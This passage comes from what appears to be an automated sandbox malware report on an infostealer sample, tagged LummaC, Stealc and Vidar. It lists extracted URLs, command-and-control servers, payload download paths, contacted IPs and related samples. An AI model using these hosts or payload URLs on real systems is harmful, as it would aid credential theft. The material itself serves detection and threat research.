http://46.8.231.109UVWXYZ1234567890undary=----CGHCGIIDGDAKFIEBKFCFaultrelease	RegAsm.exe, 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/x	RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://5.75.211.162rt/form-data;	RegAsm.exe, 0000003D.00000002.3280037967.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reinforcenh.shop/apii	RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://help.steampowered.com/en/	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	FCFBFB.10.dr	false	Avira URL Cloud: safe	unknown
https://stogeneratmns.shop/apiT	RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll8	RegAsm.exe, 00000004.00000002.2536324223.000000000135D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://offensivedzvju.shop/	RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wallkedsleeoi.shop/api1	RegAsm.exe, 0000003A.00000002.3006610464.000000000164A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/c4754d4f680ead72.php32	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe0	RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ballotnwu.site:443/api$	RegAsm.exe, 0000003A.00000002.3006610464.000000000166D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162ta	RegAsm.exe, 0000003D.00000002.3280037967.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	RDPWInst.exe, 0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://ballotnwu.site:443/apiprofiles/76561199724331900	RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://reinforcenh.shop/e	RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllj	RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll4	RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	false	Avira URL Cloud: safe	unknown
http://hansgborn.eu	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.1620.5938.132	RegAsm.exe, 0000003D.00000002.3280037967.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	false	URL Reputation: safe	unknown
http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll0	RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.orgBKJ	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://api.ipify.orgd	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.231.109/c4754d4f680ead72.phpnu	RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://api.ipify.orgX	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hansgborn.eud	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/pet_	RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.231.109	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.21.58.182	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.128.144	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	ghostreedmnu.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.194.216	wallkedsleeoi.shop	United States	13335	CLOUDFLARENETUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519761
Start date and time:	2024-09-27 00:14:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@94/73@17/15
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 86 Number of non-executed functions: 251
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 40.69.42.241, 13.85.23.206
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:15:19	API Interceptor	6x Sleep call for process: RegAsm.exe modified
18:15:21	API Interceptor	1x Sleep call for process: userBGIJEGCGDG.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.8.231.109	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
8.46.123.33	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	GvQcD0PvEH.exe	Get hash	malicious	Unknown	Browse
	exe4.bin.bak.exe	Get hash	malicious	BlackMoon, GhostRat	Browse
147.45.44.104	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	147.45.44.104
	https://bnbvfd.crabdance.com/clients/login.php	Get hash	malicious	Unknown	Browse	147.45.45.70
	https://tmsm.krtra.com/c/R2QnECLcaUYf/mYo0	Get hash	malicious	Unknown	Browse	147.45.47.98
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
AS-PUBMATICUS	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	8.46.123.33
	http://bt-105687.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	185.64.191.210
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	198.47.127.20
	https://is.gd/fxcRir	Get hash	malicious	Unknown	Browse	198.47.127.18
	https://cancelar-plan-pr0teccion1.w3spaces.com/	Get hash	malicious	Unknown	Browse	198.47.127.19
	https://mail-105280.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://telstra-102246.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://mitammakslogona.gitbook.io/	Get hash	malicious	Unknown	Browse	185.64.191.210
	https://telstra-104752.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://attdeskservertyurx.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	https://upholdxyi_login.godaddysites.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://eastlink-100612.weeblysite.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://www.filemail.com/d/qyopmnowcnooqdd	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://url.us.m.mimecastprotect.com/s/NhduCzpA73FDm0Yhgi0C9-qzu?domain=filemail.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	175e4400e2e99b0d0ac35bd3fe68519fa91f9ae5cc7a7.exe	Get hash	malicious	Quasar	Browse	188.114.97.3
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
	https://finalstepgo.com/uploads/il2.txt	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.128.144 188.114.96.3 104.102.49.254 104.21.58.182 172.67.194.216 172.67.208.139
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
